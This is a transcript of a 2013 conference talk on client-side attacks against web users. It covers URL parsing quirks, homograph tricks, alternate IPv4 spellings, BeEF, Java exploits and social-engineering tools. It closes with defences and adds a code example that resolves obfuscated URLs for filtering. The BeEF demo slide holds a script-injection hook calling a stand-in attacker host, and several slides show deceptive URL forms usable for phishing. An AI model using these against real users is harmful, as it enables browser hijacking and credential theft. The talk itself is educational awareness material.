Welcome to the world of hacking

Post on 23-Jan-2015


This presentation was prepared specially for IT Weekend Lviv, October 2013, and covers client-side attacks against web users.

Transcript of Welcome to the world of hacking

Welcome to the world of

HACKING

by Nazar Tymoshyk, R&D team, SoftServe & Bohdan Serednyskyj, R&D team, SoftServe

What this topic is about?

How my friends see it / What my mother thinks / How society perceives it

How the government sees it / How I imagine it / And what it really is

This is more of an educational topic than a motivational one

Amateurs hack systems, professionals hack PEOPLE

Client Side Attacks

About me

Feel free to ask me anything :)

Best SoftServe Team – R&D

Security Team

Nazar Tymoshyk: CEH, HP FSTS, CIW WSS, Cisco SS, ZSS, CLE, DCTS, DCATS, NAI, CLP, NLTS, CNA, NCLA, MCTS

Bohdan Serednytskyi: CEH, MSTC Security, ZSS

Certifications

Ph.D in Security

Identity & Security

SoftServe experts are certified in HP Fortify

Security Testing solution

Time for fun. Just relax

Target – web users

Everybody knows that the government is spying on us

Every day we are getting suspicious emails

And online promotions

Yes!!! Just click link below

Quick Quiz

1. Will this URL work in IE?

http:\\example.com\

2. What page will be opened in Firefox browser after entering this URL?

http://example.com\@coredump.cx/

Answers

1. Yes. IE and most browsers parse “\” as “/” for usability reasons.

2. In Firefox, that URL will take the user to coredump.cx, because example.com\ will be interpreted as a valid value for the login field. In almost all other browsers, “\” will be interpreted as a path delimiter, and the user will land on example.com instead.

Now try it yourself and see what you get!

Tricky URLs

For all browsers, http://example.com&gibberish=1234@167772161/ is http://10.0.0.1/

And http://example.com\@coredump.cx/ is http://example.com/ for all… but for Firefox it’s http://coredump.cx/

This is it!

Cheaters

http://example.com/.wholesome-domain.com/

The slash after example.com only looks like a real slash. Read: Evgeniy Gabrilovich and Alex Gontmakher, “The Homograph Attack”.

Server addresses

• http://127.0.0.1/ – This is the canonical representation of an IPv4 address.

• http://0x7f.1/ – This is a representation of the same address that uses a hexadecimal number for the first octet and concatenates all the remaining octets into a single decimal value.

• http://017700000001/ – The same address denoted as a 0-prefixed octal value, with all octets concatenated into a single 32-bit integer.
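The quiz URLs and the three server-address spellings above, worked through in code. This is an added example, not from the slides: it models the current WHATWG/Chrome parsing rules (the old Firefox login-field behaviour from answer 2 is not modelled), uses Node's built-in URL class only as a cross-check, and the function names decodeIPv4, effectiveHost and browserHost are my own. The defensive point is that a URL filter or allowlist must compare the canonical host a real parser resolves, not the string a user sees.

```javascript
// Added example (not from the slides). Assumes Node.js; the global URL class is
// only used as a cross-check of the hand-written parsing below.

// Decode the IPv4 spellings browsers accept (WHATWG IPv4 rules): hex parts
// (0x7f), leading-zero octal (0177...), and fewer than four parts, where the
// last part fills all remaining octets. Returns null if not an IPv4 form.
function decodeIPv4(host) {
  const parts = host.split(".");
  if (parts.length > 4 || parts.some((p) => p === "")) return null;
  const nums = [];
  for (let p of parts) {
    let radix = 10;
    if (/^0x/i.test(p)) { radix = 16; p = p.slice(2); }
    else if (p.length > 1 && p[0] === "0") { radix = 8; p = p.slice(1); }
    if (p === "") { nums.push(0); continue; }            // "0x" alone is 0
    const digits = { 10: /^[0-9]+$/, 16: /^[0-9a-f]+$/i, 8: /^[0-7]+$/ }[radix];
    if (!digits.test(p)) return null;
    nums.push(parseInt(p, radix));
  }
  const last = nums.pop();                               // absorbs the rest
  if (nums.some((n) => n > 255) || last >= 256 ** (4 - nums.length)) return null;
  let value = last;
  nums.forEach((n, i) => { value += n * 256 ** (3 - i); });
  return [24, 16, 8, 0].map((s) => (value >>> s) & 255).join(".");
}

// Split the authority the way current browsers do: "\" ends it exactly like
// "/", and the LAST "@" before that separates userinfo from the real host.
function effectiveHost(url) {
  const rest = url.replace(/^[a-z][a-z0-9+.-]*:[\/\\]{2}/i, "");
  const authority = rest.split(/[\/\\?#]/, 1)[0];
  const at = authority.lastIndexOf("@");
  const userinfo = at >= 0 ? authority.slice(0, at) : "";
  const raw = (at >= 0 ? authority.slice(at + 1) : authority)
    .toLowerCase().replace(/:\d*$/, "");                 // drop an explicit port
  const ip = decodeIPv4(raw);
  return { host: ip || raw, userinfo, numericHost: ip !== null };
}

// What the platform's WHATWG parser resolves (null if it rejects the URL).
function browserHost(url) {
  try { return new URL(url).hostname; } catch (e) { return null; }
}

const samples = ["http://example.com&gibberish=1234@167772161/",
  "http://example.com\\@coredump.cx/", "http://0x7f.1/", "http://017700000001/"];
for (const u of samples) {
  const r = effectiveHost(u);
  console.log(u, "->", r.host, r.userinfo ? "(userinfo!)" : "", "| URL:", browserHost(u));
}
```

A URL whose userinfo is non-empty or whose host decodes to a non-canonical numeric form is the signal a filter should act on, regardless of what the leading part of the string looks like.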

Now attention

Recommended Book

DEMO I

BeEF – Browser Exploitation Framework

Our victim site <script src=http://attackersite/hook.js></script>

http://192.168.241.240:8882

Now about Java

Everybody likes Java

But there is a small problem

in 2013

Java exploits in Metasploit 4

Status - Excellent

JVM vulnerabilities

DEMO II

Social Engineering Toolkit

Consequences

• Stolen developer cloud access certificates
• Malware and spyware on PC and mobile
• Key loggers
• Money lost – PayPal, WebMoney, etc.
• Email – recovery and stolen accounts
• SHAME!

Recommendations

• Up-to-date Java and all other software
• Antivirus – Kaspersky rocks!
• Encrypted keys to infrastructure
• 2-factor authentication everywhere (email first)
• Verify yourself and your browser on …
• Attention

OWASP Secure Coding Guide

Apache Shiro

OWASP WebGoat, DVWA - Train yourself in Security

Hope you like it!

Now ask!

Thank You!

Copyright © 2013 SoftServe, Inc.

Email: root.nt@gmail.com
Skype: root_nt